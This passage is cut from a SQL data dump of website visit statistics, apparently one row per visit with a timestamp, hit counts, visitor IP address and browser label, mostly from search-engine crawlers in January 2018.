3,1517033577,1,1,0,0,'37.53.187.53','chrome'),(202424,1517033676,1,1,0,0,'141.8.142.74','other'),(202425,1517033724,1,1,0,0,'54.36.149.42','other'),(202426,1517034215,1,1,0,0,'54.36.148.74','other'),(202427,1517034754,2,2,0,0,'216.244.66.194','other'),(202428,1517034778,1,1,0,0,'54.36.149.23','other'),(202429,1517034867,1,1,0,0,'54.36.148.44','other'),(202430,1517034942,1,1,0,0,'157.55.39.249','other'),(202431,1517035106,1,0,1,0,'66.249.64.30',''),(202432,1517035495,1,1,0,0,'178.154.171.88','other'),(202433,1517035851,2,2,0,0,'216.244.66.246','other'),(202434,1517036279,1,1,0,0,'54.36.148.92','other'),(202435,1517036425,1,1,0,0,'37.53.231.125','chrome'),(202436,1517036619,1,0,1,0,'66.249.64.29',''),(202437,1517036633,1,1,0,0,'54.36.148.119','other'),(202438,1517036973,1,1,0,0,'178.154.171.88','other'),(202439,1517037012,1,1,0,0,'54.36.148.171','other'),(202440,1517037460,1,1,0,0,'54.36.149.20','other'),(202441,1517037532,1,1,0,0,'91.196.178.91','chrome'),(202442,1517037732,1,1,0,0,'54.36.148.203','other'),(202443,1517038597,1,1,0,0,'54.36.148.144','other'),(202444,1517039129,1,1,0,0,'54.36.148.248','other'),(202445,1517039313,1,1,0,0,'54.36.148.105','other'),(202446,1517039633,1,1,0,0,'141.8.142.74','other'),(202447,1517039690,1,1,0,0,'54.36.149.82','other'),(202448,1517039820,1,1,0,0,'178.154.171.88','other'),(202449,1517039914,1,1,0,0,'54.36.148.128','other'),(202450,1517039927,1,0,1,0,'66.249.64.28',''),(202451,1517040159,3,3,0,0,'216.244.66.246','other'),(202452,1517041364,1,1,0,0,'8.29.198.25','other'),(202453,1517041583,1,1,0,0,'141.8.142.74','other'),(202454,1517041614,1,1,0,0,'51.255.71.120','other'),(202455,1517042510,1,1,0,0,'51.255.71.132','other'),(202456,1517042648,1,1,0,0,'54.36.149.73','other'),(202457,1517042847,1,1,0,0,'54.36.149.103','other'),(202458,1517042880,2,2,0,0,'216.244.66.194','other'),(202459,1517043285,1,1,0,0,'178.154.171.55','other'),(202460,1517043473,1,1,0,0,'37.9.113.100','other'),(202461,1517043673,1,0,1,0,'66.249.64.221',''),(202462,1517043812,1,1,0,0,'54.36.149.41','other'),(202463,1517043822,1,1,0,0,'66.249.64.29','chrome'),(202464,1517043853,1,1,0,0,'54.36.148.11','other'),(202465,1517044010,1,1,0,0,'51.255.71.115','other'),(202466,1517044545,1,0,1,0,'66.249.64.30',''),(202467,1517044887,28,28,0,0,'91.137.16.137','other'),(202468,1517045159,5,5,0,0,'216.244.66.194','other'),(202469,1517045204,1,1,0,0,'51.255.71.128','other'),(202470,1517045375,1,1,0,0,'54.36.148.132','other'),(202471,1517045540,1,1,0,0,'54.36.149.35','other'),(202472,1517045609,1,1,0,0,'54.36.149.32','other'),(202473,1517045704,1,1,0,0,'178.154.171.88','other'),(202474,1517046695,3,3,0,0,'216.244.66.246','other'),(202475,1517046895,1,1,0,0,'54.36.149.17','other'),(202476,1517047452,1,1,0,0,'54.36.148.42','other'),(202477,1517047495,1,1,0,0,'178.154.171.88','other'),(202478,1517047634,1,1,0,0,'216.244.66.237','other'),(202479,1517047704,1,1,0,0,'54.36.148.155','other'),(202480,1517048074,1,1,0,0,'54.36.148.206','other'),(202481,1517048420,1,1,0,0,'54.36.149.85','other'),(202482,1517048513,1,1,0,0,'54.36.148.237','other'),(202483,1517048965,1,1,0,0,'107.178.194.60','msie'),(202484,1517049105,1,1,0,0,'50.19.154.226','msie'),(202485,1517049108,1,1,0,0,'50.112.194.65','msie'),(202486,1517049948,1,1,0,0,'37.52.22.79','chrome'),(202487,1517049954,1,1,0,0,'46.161.9.52','firefox'),(202488,1517050235,1,1,0,0,'157.55.39.187','other'),(202489,1517050340,1,1,0,0,'216.244.66.246','other'),(202490,1517050464,1,1,0,0,'141.8.142.74','other'),(202491,1517051180,1,1,0,0,'54.36.148.102','other'),(202492,1517051243,1,1,0,0,'34.239.255.31','other'),(202493,1517051254,1,1,0,0,'54.36.148.52','other'),(202494,1517051513,2,2,0,0,'141.8.142.74','other'),(202495,1517051560,1,1,0,0,'54.36.149.88','other'),(202496,1517051572,1,1,0,0,'192.3.215.114','other'),(202497,1517051573,1,1,0,0,'137.74.207.170','other'),(202498,1517052056,1,1,0,0,'54.36.149.56','other'),(202499,1517052191,1,1,0,0,'8.29.198.27','other'),(202500,1517052335,1,1,0,0,'46.161.9.52','chrome'),(202501,1517052492,1,1,0,0,'54.36.148.84','other'),(202502,1517053154,1,1,0,0,'141.8.142.74','other'),(202503,1517053283,1,1,0,0,'54.36.149.73','other'),(202504,1517053302,1,1,0,0,'54.36.148.39','other'),(202505,1517053451,1,1,0,0,'178.154.171.88','other'),(202506,1517054014,1,1,0,0,'54.36.148.22','other'),(202507,1517054196,1,1,0,0,'54.36.148.140','other'),(202508,1517054693,1,1,0,0,'54.36.149.11','other'),(202509,1517054962,1,1,0,0,'51.255.71.123','other'),(202510,1517055136,2,2,0,0,'216.244.66.194','other'),(202511,1517055162,1,1,0,0,'54.36.149.74','other'),(202512,1517055423,1,1,0,0,'54.36.148.146','other'),(202513,1517055466,1,1,0,0,'213.180.203.7','other'),(202514,1517055481,1,1,0,0,'54.36.148.182','other'),(202515,1517056059,2,2,0,0,'46.133.11.31','chrome'),(202516,1517056332,1,1,0,0,'54.36.148.28','other'),(202517,1517056522,1,1,0,0,'54.36.148.243','other'),(202518,1517056595,1,1,0,0,'54.36.148.97','other'),(202519,1517056666,2,2,0,0,'216.244.66.246','other'),(202520,1517056947,1,1,0,0,'54.36.148.202','other'),(202521,1517057206,1,1,0,0,'54.36.149.39','other'),(202522,1517057637,1,1,0,0,'5.45.207.49','other'),(202523,1517057642,1,1,0,0,'37.9.113.110','other'),(202524,1517057689,1,1,0,0,'54.36.148.143','other'),(202525,1517058208,1,1,0,0,'178.154.171.60','other'),(202526,1517058898,1,1,0,0,'217.96.196.196','msie'),(202527,1517059277,1,1,0,0,'54.36.148.244','other'),(202528,1517059357,1,1,0,0,'216.244.66.237','other'),(202529,1517059460,2,2,0,0,'178.154.171.88','other'),(202530,1517059578,1,1,0,0,'217.69.133.12','other'),(202531,1517059701,1,1,0,0,'54.36.148.70','other'),(202532,1517059702,1,1,0,0,'54.36.148.131','other'),(202533,1517059843,1,1,0,0,'54.36.148.102','other'),(202534,1517059994,1,1,0,0,'40.77.167.169','other'),(202535,1517060404,1,1,0,0,'54.36.148.61','other'),(202536,1517060754,1,1,0,0,'54.36.149.19','other'),(202537,1517060786,1,1,0,0,'217.69.133.59','other'),(202538,1517060816,1,1,0,0,'54.36.148.93','other'),(202539,1517060881,1,1,0,0,'54.36.148.202','other'),(202540,1517060998,2,2,0,0,'216.244.66.246','other'),(202541,1517061505,1,1,0,0,'54.36.148.108','other'),(202542,1517061922,1,0,1,0,'66.249.64.30',''),(202543,1517062109,1,1,0,0,'54.36.149.83','other'),(202544,1517062127,1,1,0,0,'54.36.149.31','other'),(202545,1517062324,1,1,0,0,'54.36.148.240','other'),(202546,1517062435,1,1,0,0,'54.36.148.186','other'),(202547,1517062606,1,1,0,0,'178.154.171.88','other'),(202548,1517062679,1,1,0,0,'54.36.148.65','other'),(202549,1517062748,1,1,0,0,'54.36.148.182','other'),(202550,1517063012,1,1,0,0,'8.29.198.27','other'),(202551,1517063125,5,5,0,0,'216.244.66.194','other'),(202552,1517063298,1,1,0,0,'54.36.148.140','other'),(202553,1517063532,1,1,0,0,'178.154.171.88','other'),(202554,1517063583,1,1,0,0,'141.8.142.74','other'),(202555,1517064152,1,1,0,0,'54.36.148.53','other'),(202556,1517064394,1,1,0,0,'54.36.149.10','other'),(202557,1517065050,2,2,0,0,'216.244.66.194','other'),(202558,1517065375,1,1,0,0,'141.8.142.74','other'),(202559,1517065531,1,1,0,0,'54.36.149.105','other'),(202560,1517065805,1,1,0,0,'54.36.148.184','other'),(202561,1517066075,1,1,0,0,'54.36.148.150','other'),(202562,1517066092,1,1,0,0,'66.249.64.217','chrome'),(202563,1517066147,1,1,0,0,'51.255.71.117','other'),(202564,1517066149,1,1,0,0,'54.36.149.11','other'),(202565,1517066267,2,2,0,0,'216.244.66.246','other'),(202566,1517066388,1,1,0,0,'54.36.149.4','other'),(202567,1517066427,1,1,0,0,'54.36.149.18','other'),(202568,1517066439,1,1,0,0,'40.77.167.169','other'),(202569,1517066584,1,1,0,0,'54.36.148.126','other'),(202570,1517066652,1,1,0,0,'54.36.148.39','other'),(202571,1517066660,1,1,0,0,'54.36.148.236','other'),(202572,1517066683,1,1,0,0,'54.36.149.60','other'),(202573,1517066747,1,1,0,0,'95.133.193.49','chrome'),(202574,1517066805,1,1,0,0,'188.230.43.254','other'),(202575,1517066969,1,1,0,0,'54.36.148.23','other'),(202576,1517067375,1,1,0,0,'141.8.142.74','other'),(202577,1517067401,1,1,0,0,'54.36.148.139','other'),(202578,1517067589,1,1,0,0,'178.95.233.202','chrome'),(202579,1517067959,1,1,0,0,'54.36.148.124','other'),(202580,1517067965,1,1,0,0,'54.36.148.127','other'),(202581,1517068225,1,0,1,0,'66.249.64.28',''),(202582,1517068401,1,1,0,0,'109.252.52.241','chrome'),(202583,1517068600,1,1,0,0,'51.255.71.131','other'),(202584,1517068630,2,2,0,0,'141.8.142.74','other'),(202585,1517068961,1,1,0,0,'157.55.39.187','other'),(202586,1517068964,1,1,0,0,'141.8.132.19','other'),(202587,1517069057,1,1,0,0,'54.36.149.63','other'),(202588,1517069210,1,1,0,0,'188.230.43.254','other'),(202589,1517069378,1,1,0,0,'54.36.148.70','other'),(202590,1517069581,1,1,0,0,'54.36.149.97','other'),(202591,1517069724,1,1,0,0,'54.36.148.23','other'),(202592,1517069880,1,1,0,0,'95.221.225.97','msie'),(202593,1517069952,1,1,0,0,'54.36.148.132','other'),(202594,1517070300,2,2,0,0,'141.8.142.74','other'),(202595,1517070326,1,1,0,0,'54.36.148.15','other'),(202596,1517070546,1,1,0,0,'34.239.255.31','other'),(202597,1517070756,1,1,0,0,'54.36.148.143','other'),(202598,1517070971,1,0,1,0,'66.249.64.30',''),(202599,1517071104,1,1,0,0,'93.76.212.122','other'),(202600,1517071300,1,1,0,0,'37.9.113.182','other'),(202601,1517071303,1,1,0,0,'87.250.224.46','other'),(202602,1517071313,1,1,0,0,'54.36.149.35','other'),(202603,1517071380,3,3,0,0,'216.244.66.246','other'),(202604,1517071605,1,1,0,0,'188.230.43.254','other'),(202605,1517071609,1,1,0,0,'54.36.149.21','other'),(202606,1517071718,1,1,0,0,'54.36.148.234','other'),(202607,1517071747,1,1,0,0,'54.36.148.238','other'),(202608,1517071914,1,1,0,0,'54.36.148.193','other'),(202609,1517072003,1,1,0,0,'51.255.71.132','other'),(202610,1517072014,1,1,0,0,'95.220.14.76','chrome'),(202611,1517072164,1,0,1,0,'66.249.64.30',''),(202612,1517072403,1,1,0,0,'54.36.148.125','other'),(202613,1517072667,1,1,0,0,'54.36.148.126','other'),(202614,1517072772,1,1,0,0,'54.36.149.23','other'),(202615,1517072892,1,1,0,0,'51.255.71.127','other'),(202616,1517073203,1,1,0,0,'54.36.148.105','other'),(202617,1517073372,1,1,0,0,'54.36.148.54','other'),(202618,1517073489,3,3,0,0,'216.244.66.194','other'),(202619,1517073558,1,1,0,0,'54.36.148.237','other'),(202620,1517073746,1,1,0,0,'157.55.39.187','other'),(202621,1517073771,1,1,0,0,'54.36.148.185','other'),(202622,1517073843,1,1,0,0,'8.29.198.25','other'),(202623,1517073916,1,0,1,0,'66.249.64.29',''),(202624,1517074139,1,1,0,0,'51.255.71.129','other'),(202625,1517074422,1,1,0,0,'54.36.148.124','other'),(202626,1517074469,1,1,0,0,'180.76.15.24','other'),(202627,1517075149,1,1,0,0,'216.244.66.194','other'),(202628,1517075232,1,1,0,0,'54.36.149.85','other'),(202629,1517075312,1,1,0,0,'54.36.149.82','other'),(202630,1517075318,1,1,0,0,'51.255.71.115','other'),(202631,1517075359,1,1,0,0,'178.154.171.60','other'),(202632,1517075571,1,1,0,0,'54.36.149.20','other'),(202633,1517075579,1,1,0,0,'54.36.149.24','other'),(202634,1517075623,1,1,0,0,'54.36.149.76','other'),(202635,1517075637,1,0,1,0,'66.249.64.28',''),(202636,1517075712,1,1,0,0,'178.92.248.44','chrome'),(202637,1517076002,1,1,0,0,'213.180.203.7','other'),(202638,1517076159,1,1,0,0,'51.255.71.121','other'),(202639,1517076240,1,1,0,0,'216.244.66.246','other'),(202640,1517076632,1,1,0,0,'51.255.71.113','other'),(202641,1517076739,1,1,0,0,'54.36.148.243','other'),(202642,1517076868,1,1,0,0,'217.69.133.234','other'),(202643,1517077068,1,0,1,0,'68.180.229.52',''),(202644,1517077295,1,1,0,0,'37.9.113.115','other'),(202645,1517077541,1,1,0,0,'178.92.248.44','chrome'),(202646,1517077636,1,1,0,0,'37.9.113.110','other'),(202647,1517077818,1,1,0,0,'54.36.149.102','other'),(202648,1517077839,2,0,2,0,'66.249.64.221',''),(202649,1517077852,1,1,0,0,'66.249.64.30','chrome'),(202650,1517077928,1,1,0,0,'54.36.149.33','other'),(202651,1517077929,1,1,0,0,'54.36.148.61','other'),(202652,1517078175,2,2,0,0,'157.55.39.238','other'),(202653,1517078998,1,1,0,0,'54.36.149.22','other'),(202654,1517079177,1,1,0,0,'54.36.149.11','other'),(202655,1517079307,1,1,0,0,'54.36.148.233','other'),(202656,1517079365,1,1,0,0,'54.36.148.197','other'),(202657,1517079397,1,1,0,0,'54.36.148.10','other'),(202658,1517079770,1,1,0,0,'54.36.149.27','other'),(202659,1517079825,1,1,0,0,'54.36.149.3','other'),(202660,1517080001,1,1,0,0,'54.36.149.5','other'),(202661,1517080141,1,0,1,0,'66.249.64.28',''),(202662,1517080725,1,1,0,0,'54.36.148.91','other'),(202663,1517081041,1,1,0,0,'54.36.148.84','other'),(202664,1517081106,1,1,0,0,'54.36.148.48','other'),(202665,1517081229,2,2,0,0,'162.210.196.98','other'),(202666,1517081888,1,0,1,0,'66.249.64.217',''),(202667,1517081922,3,3,0,0,'216.244.66.246','other'),(202668,1517082348,1,1,0,0,'87.250.224.66','other'),(202669,1517082606,1,1,0,0,'46.175.132.181','chrome'),(202670,1517082969,1,1,0,0,'157.55.39.187','other'),(202671,1517083071,1,1,0,0,'54.36.148.12','other'),(202672,1517083391,1,1,0,0,'141.8.142.50','other'),(202673,1517083407,1,1,0,0,'107.167.106.237','other'),(202674,1517083595,3,3,0,0,'216.244.66.194','other'),(202675,1517083999,1,1,0,0,'157.55.39.238','other'),(202676,1517084220,1,1,0,0,'178.154.171.24','other'),(202677,1517084543,1,1,0,0,'54.36.148.81','other'),(202678,1517084659,1,1,0,0,'40.77.167.169','other'),(202679,1517084662,1,1,0,0,'216.244.66.237','other'),(202680,1517084665,1,1,0,0,'87.250.224.85','other'),(202681,1517084666,1,1,0,0,'8.29.198.26','other'),(202682,1517084943,3,3,0,0,'216.244.66.194','other'),(202683,1517084983,1,1,0,0,'157.55.39.238','other'),(202684,1517085222,1,1,0,0,'37.9.113.56','other'),(202685,1517085343,1,1,0,0,'54.36.149.51','other'),(202686,1517085376,1,1,0,0,'216.244.66.246','other'),(202687,1517085536,1,1,0,0,'188.32.18.237','msie'),(202688,1517085881,1,1,0,0,'54.36.148.170','other'),(202689,1517086013,1,1,0,0,'178.154.171.55','other'),(202690,1517086016,1,1,0,0,'87.250.224.77','other'),(202691,1517086231,1,1,0,0,'54.36.148.90','other'),(202692,1517087157,1,1,0,0,'54.36.149.93','other'),(202693,1517087160,1,0,1,0,'66.249.64.29',''),(202694,1517087963,1,1,0,0,'54.36.148.193','other'),(202695,1517088017,1,1,0,0,'54.36.148.27','other'),(202696,1517088019,1,1,0,0,'40.77.167.169','other'),(202697,1517088425,1,1,0,0,'5.58.5.6','msie'),(202698,1517088426,1,1,0,0,'54.36.148.112','other'),(202699,1517088722,1,1,0,0,'54.36.148.249','other'),(202700,1517088769,1,1,0,0,'54.36.149.88','other'),(202701,1517088855,1,1,0,0,'54.36.148.60','other'),(202702,1517088903,1,1,0,0,'54.36.148.182','other'),(202703,1517089190,1,1,0,0,'37.9.113.80','other'),(202704,1517089284,1,1,0,0,'54.36.148.69','other'),(202705,1517090182,1,1,0,0,'46.211.26.211','chrome'),(202706,1517090189,1,1,0,0,'37.9.113.151','other'),(202707,1517090283,1,1,0,0,'46.211.98.168','chrome'),(202708,1517090317,1,1,0,0,'188.165.4.128','firefox'),(202709,1517090430,1,1,0,0,'54.36.148.48','other'),(202710,1517090517,2,2,0,0,'54.36.148.30','other'),(202711,1517090670,1,1,0,0,'159.89.96.70','other'),(202712,1517091108,1,1,0,0,'54.36.149.43','other'),(202713,1517091170,1,1,0,0,'87.250.224.85','other'),(202714,1517091282,1,1,0,0,'54.36.148.86','other'),(202715,1517091327,1,1,0,0,'54.36.148.162','other'),(202716,1517091503,1,1,0,0,'54.36.148.126','other'),(202717,1517091574,1,1,0,0,'54.36.149.44','other'),(202718,1517092076,1,1,0,0,'54.36.149.71','other'),(202719,1517092142,1,1,0,0,'216.244.66.246','other'),(202720,1517092431,1,1,0,0,'54.36.148.253','other'),(202721,1517092520,2,2,0,0,'40.77.167.169','other'),(202722,1517092809,1,1,0,0,'54.36.148.137','other'),(202723,1517092858,1,1,0,0,'188.165.4.128','chrome'),(202724,1517093132,1,1,0,0,'95.132.20.19','other'),(202725,1517093390,8,8,0,0,'216.244.66.194','other'),(202726,1517093526,1,1,0,0,'54.36.148.99','other'),(202727,1517093807,1,1,0,0,'54.36.148.78','other'),(202728,1517094426,1,1,0,0,'54.36.148.166','other'),(202729,1517094449,1,1,0,0,'54.36.148.182','other'),(202730,1517094547,1,1,0,0,'54.36.149.106','other'),(202731,1517095023,1,1,0,0,'157.55.39.238','other'),(202732,1517095483,1,1,0,0,'8.29.198.25','other'),(202733,1517095509,1,1,0,0,'216.244.66.194','other'),(202734,1517095590,1,1,0,0,'54.36.148.240','other'),(202735,1517095633,5,5,0,0,'216.244.66.246','other'),(202736,1517095960,1,1,0,0,'54.36.149.73','other'),(202737,1517095995,1,1,0,0,'5.45.207.69','other'),(202738,1517096126,1,1,0,0,'66.249.64.221','chrome'),(202739,1517096484,1,1,0,0,'54.36.148.98','other'),(202740,1517096784,1,1,0,0,'54.36.149.45','other'),(202741,1517097153,1,1,0,0,'91.209.11.236','other'),(202742,1517097376,1,0,1,0,'68.180.229.52',''),(202743,1517097592,1,1,0,0,'54.36.149.61','other'),(202744,1517097945,1,1,0,0,'37.9.113.80','other'),(202745,1517098070,1,1,0,0,'91.209.11.236','other'),(202746,1517098567,1,1,0,0,'54.36.148.248','other'),(202747,1517098635,1,1,0,0,'54.36.148.68','other'),(202748,1517100542,1,1,0,0,'54.36.148.196','other'),(202749,1517100891,1,1,0,0,'54.36.148.33','other'),(202750,1517101198,1,1,0,0,'54.36.148.12','other'),(202751,1517101225,1,1,0,0,'54.36.148.244','other'),(202752,1517101359,1,0,1,0,'66.249.64.28',''),(202753,1517101648,2,2,0,0,'216.244.66.246','other'),(202754,1517101758,1,1,0,0,'54.36.148.166','other'),(202755,1517101781,1,1,0,0,'54.36.149.78','other'),(202756,1517102012,1,1,0,0,'51.255.71.116','other'),(202757,1517102153,1,1,0,0,'54.36.148.143','other'),(202758,1517102737,1,1,0,0,'216.244.66.237','other'),(202759,1517102763,1,1,0,0,'37.9.113.63','other'),(202760,1517102915,1,1,0,0,'54.36.148.24','other'),(202761,1517103371,1,0,1,0,'66.249.64.219',''),(202762,1517103384,1,1,0,0,'66.249.64.30','chrome'),(202763,1517103557,1,1,0,0,'54.36.149.24','other'),(202764,1517103582,1,1,0,0,'54.36.149.82','other'),(202765,1517103659,5,5,0,0,'216.244.66.194','other'),(202766,1517104061,1,1,0,0,'54.36.148.34','other'),(202767,1517104248,1,1,0,0,'54.36.148.77','other'),(202768,1517104779,1,1,0,0,'37.9.113.63','other'),(202769,1517104806,1,1,0,0,'54.36.149.51','other'),(202770,1517104978,1,1,0,0,'54.36.149.0','other'),(202771,1517105111,1,1,0,0,'54.36.148.18','other'),(202772,1517105380,5,5,0,0,'216.244.66.194','other'),(202773,1517105474,1,1,0,0,'54.36.149.35','other'),(202774,1517105927,1,1,0,0,'91.209.11.236','other'),(202775,1517105977,5,5,0,0,'216.244.66.246','other'),(202776,1517106318,1,1,0,0,'8.29.198.26','other'),(202777,1517106552,1,1,0,0,'54.36.149.8','other'),(202778,1517107523,1,1,0,0,'37.113.12.166','firefox'),(202779,1517107758,1,1,0,0,'54.36.148.190','other'),(202780,1517108118,1,1,0,0,'54.36.148.61','other'),(202781,1517108401,1,1,0,0,'157.55.39.66','other'),(202782,1517108639,1,1,0,0,'54.36.149.55','other'),(202783,1517109028,1,1,0,0,'54.36.148.83','other'),(202784,1517109162,1,1,0,0,'54.36.149.71','other'),(202785,1517109410,1,1,0,0,'54.36.149.1','other'),(202786,1517109596,1,1,0,0,'178.154.171.55','other'),(202787,1517110107,1,1,0,0,'37.113.12.166','firefox'),(202788,1517110201,1,1,0,0,'54.36.148.61','other'),(202789,1517110224,1,1,0,0,'54.36.149.98','other'),(202790,1517110321,1,1,0,0,'157.55.39.187','other'),(202791,1517110666,1,1,0,0,'54.36.148.253','other'),(202792,1517110737,1,1,0,0,'54.36.149.81','other'),(202793,1517111006,1,1,0,0,'51.255.71.122','other'),(202794,1517111501,1,1,0,0,'54.36.148.166','other'),(202795,1517111543,1,1,0,0,'54.36.149.20','other'),(202796,1517111580,1,1,0,0,'54.36.149.57','other'),(202797,1517111701,1,1,0,0,'178.154.171.56','other'),(202798,1517111845,1,1,0,0,'54.36.148.242','other'),(202799,1517111933,1,1,0,0,'54.36.148.34','other'),(202800,1517111941,6,6,0,0,'216.244.66.246','other'),(202801,1517111956,1,1,0,0,'157.55.39.249','other'),(202802,1517112542,1,1,0,0,'51.255.71.122','other'),(202803,1517112995,1,1,0,0,'54.36.149.51','other'),(202804,1517113186,1,1,0,0,'157.55.39.175','other'),(202805,1517113245,1,1,0,0,'54.36.148.166','other'),(202806,1517113300,1,1,0,0,'157.55.39.249','other'),(202807,1517113400,6,6,0,0,'216.244.66.194','other'),(202808,1517113470,1,1,0,0,'54.36.149.73','other'),(202809,1517113630,1,1,0,0,'54.36.149.85','other'),(202810,1517114132,1,1,0,0,'46.188.32.56','msie'),(202811,1517114257,1,0,1,0,'66.249.64.30',''),(202812,1517114340,1,1,0,0,'54.36.149.21','other'),(202813,1517115325,1,1,0,0,'54.36.148.68','other'),(202814,1517116095,5,5,0,0,'216.244.66.194','other'),(202815,1517116313,1,1,0,0,'54.36.149.38','other'),(202816,1517116427,1,1,0,0,'87.250.224.66','other'),(202817,1517116447,1,0,1,0,'66.249.64.217',''),(202818,1517116770,1,1,0,0,'54.36.148.94','other'),(202819,1517116913,5,5,0,0,'216.244.66.246','other'),(202820,1517117058,1,1,0,0,'157.55.39.249','other'),(202821,1517117141,1,1,0,0,'8.29.198.26','other'),(202822,1517117483,1,1,0,0,'54.36.149.88','other'),(202823,1517118335,1,1,0,0,'54.36.148.112','other'),(202824,1517118504,1,1,0,0,'37.9.113.186','other'),(202825,1517118929,1,0,1,0,'66.249.64.29',''),(202826,1517119201,1,1,0,0,'54.36.148.200','other'),(202827,1517119266,1,1,0,0,'54.36.148.166','other'),(202828,1517119288,1,1,0,0,'54.36.149.74','other'),(202829,1517119730,1,1,0,0,'54.36.148.55','other'),(202830,1517120010,1,1,0,0,'54.234.65.223','other'),(202831,1517120137,1,1,0,0,'54.36.148.85','other'),(202832,1517120243,1,1,0,0,'54.36.148.247','other'),(202833,1517120315,1,0,1,0,'66.249.64.29',''),(202834,1517120328,1,1,0,0,'216.244.66.246','other'),(202835,1517120448,1,1,0,0,'5.141.210.170','chrome'),(202836,1517120864,1,1,0,0,'54.36.148.51','other'),(202837,1517120895,1,1,0,0,'54.36.149.69','other'),(202838,1517121626,1,1,0,0,'54.36.148.71','other'),(202839,1517121770,1,1,0,0,'37.9.113.134','other'),(202840,1517121864,1,1,0,0,'178.154.200.8','other'),(202841,1517122016,1,1,0,0,'54.36.148.85','other'),(202842,1517123255,1,1,0,0,'54.36.149.29','other'),(202843,1517123281,1,1,0,0,'37.9.113.101','other'),(202844,1517123865,1,1,0,0,'54.36.148.229','other'),(202845,1517124064,2,2,0,0,'216.244.66.194','other'),(202846,1517124219,1,1,0,0,'54.36.149.2','other'),(202847,1517124243,1,0,1,0,'66.249.64.29',''),(202848,1517124392,1,1,0,0,'54.36.148.79','other'),(202849,1517124432,1,1,0,0,'54.36.148.69','other'),(202850,1517124483,1,1,0,0,'157.55.39.175','other'),(202851,1517124807,1,1,0,0,'157.55.39.187','other'),(202852,1517125272,1,1,0,0,'54.36.148.193','other'),(202853,1517125302,1,1,0,0,'141.8.142.74','other'),(202854,1517125332,1,1,0,0,'54.36.148.165','other'),(202855,1517125831,1,1,0,0,'54.36.148.43','other'),(202856,1517126218,1,1,0,0,'54.36.148.241','other'),(202857,1517126302,1,1,0,0,'54.36.148.155','other'),(202858,1517126343,1,1,0,0,'141.8.142.74','other'),(202859,1517126423,1,1,0,0,'204.79.180.13','msie'),(202860,1517126446,3,3,0,0,'216.244.66.194','other'),(202861,1517126511,1,1,0,0,'54.36.148.190','other'),(202862,1517126592,1,1,0,0,'54.36.148.170','other'),(202863,1517126606,1,1,0,0,'66.249.64.29','chrome'),(202864,1517126653,1,1,0,0,'54.36.148.95','other'),(202865,1517126657,1,1,0,0,'54.36.149.55','other'),(202866,1517126810,1,1,0,0,'54.36.149.102','other'),(202867,1517126887,1,1,0,0,'54.36.148.192','other'),(202868,1517127115,1,1,0,0,'54.36.148.116','other'),(202869,1517127217,1,1,0,0,'54.36.148.108','other'),(202870,1517127462,1,1,0,0,'54.36.149.27','other'),(202871,1517127471,5,5,0,0,'216.244.66.246','other'),(202872,1517127540,1,1,0,0,'141.8.142.74','other'),(202873,1517127607,1,1,0,0,'54.36.148.122','other'),(202874,1517127741,1,1,0,0,'204.79.180.20','msie'),(202875,1517127970,1,1,0,0,'8.29.198.27','other'),(202876,1517128626,1,1,0,0,'54.36.149.12','other'),(202877,1517128848,1,0,1,0,'66.249.64.217',''),(202878,1517129371,1,1,0,0,'54.36.148.179','other'),(202879,1517129645,1,1,0,0,'157.55.39.66','other'),(202880,1517130116,1,1,0,0,'46.211.97.101','other'),(202881,1517130195,1,1,0,0,'141.8.142.74','other'),(202882,1517130256,1,1,0,0,'51.255.71.126','other'),(202883,1517130725,3,3,0,0,'216.244.66.246','other'),(202884,1517131142,1,1,0,0,'157.55.39.187','other'),(202885,1517131509,1,1,0,0,'54.36.148.47','other'),(202886,1517131517,1,1,0,0,'54.36.148.176','other'),(202887,1517131664,1,1,0,0,'46.211.97.101','other'),(202888,1517131669,1,1,0,0,'217.69.133.30','other'),(202889,1517131899,1,1,0,0,'54.36.148.68','other'),(202890,1517132058,1,1,0,0,'54.36.148.112','other'),(202891,1517132128,2,2,0,0,'178.154.171.88','other'),(202892,1517132633,1,1,0,0,'51.255.71.123','other'),(202893,1517132688,1,1,0,0,'66.249.64.217','chrome'),(202894,1517132710,1,1,0,0,'54.36.148.48','other'),(202895,1517132800,1,1,0,0,'87.250.224.46','other'),(202896,1517132922,49,49,0,0,'144.76.38.40','other'),(202897,1517132957,1,1,0,0,'54.36.148.110','other'),(202898,1517133515,1,1,0,0,'54.36.148.13','other'),(202899,1517133607,1,1,0,0,'54.36.148.134','other'),(202900,1517133767,1,1,0,0,'54.36.148.249','other'),(202901,1517133992,2,2,0,0,'216.244.66.194','other'),(202902,1517134204,1,1,0,0,'54.36.149.84','other'),(202903,1517134561,1,0,1,0,'66.249.64.28',''),(202904,1517134834,1,1,0,0,'54.36.148.202','other'),(202905,1517135859,1,1,0,0,'54.36.148.93','other'),(202906,1517135915,1,1,0,0,'178.154.171.88','other'),(202907,1517136137,1,1,0,0,'54.36.149.71','other'),(202908,1517136200,1,1,0,0,'54.36.149.40','other'),(202909,1517136491,3,3,0,0,'216.244.66.194','other'),(202910,1517136953,1,1,0,0,'141.8.142.74','other'),(202911,1517137002,1,1,0,0,'54.36.148.114','other'),(202912,1517137340,2,2,0,0,'178.154.171.88','other'),(202913,1517138418,1,1,0,0,'54.36.148.170','other'),(202914,1517138595,1,1,0,0,'91.196.178.35','chrome'),(202915,1517138689,1,1,0,0,'54.36.148.138','other'),(202916,1517138760,1,1,0,0,'54.36.148.56','other'),(202917,1517138764,1,1,0,0,'54.36.149.91','other'),(202918,1517138794,1,1,0,0,'8.29.198.26','other'),(202919,1517139108,1,1,0,0,'54.36.149.13','other'),(202920,1517139246,1,1,0,0,'54.36.148.58','other'),(202921,1517139535,1,1,0,0,'141.8.142.74','other'),(202922,1517140042,1,0,1,0,'66.249.64.28',''),(202923,1517140153,1,1,0,0,'66.249.64.30','chrome'),(202924,1517140686,2,2,0,0,'216.244.66.246','other'),(202925,1517141704,1,1,0,0,'91.214.209.229','chrome'),(202926,1517141873,1,0,1,0,'66.249.64.30',''),(202927,1517142064,1,1,0,0,'54.36.148.28','other'),(202928,1517142823,1,1,0,0,'51.255.71.114','other'),(202929,1517142978,1,1,0,0,'95.134.203.88','chrome'),(202930,1517142988,1,1,0,0,'54.36.148.240','other'),(202931,1517143055,1,1,0,0,'54.36.149.20','other'),(202932,1517143192,1,1,0,0,'54.36.149.19','other'),(202933,1517143302,1,1,0,0,'46.161.9.52','chrome'),(202934,1517143862,1,1,0,0,'54.36.148.37','other'),(202935,1517144080,1,1,0,0,'54.36.148.239','other'),(202936,1517144180,1,1,0,0,'54.36.148.161','other'),(202937,1517144228,1,1,0,0,'54.36.148.245','other'),(202938,1517144308,1,1,0,0,'20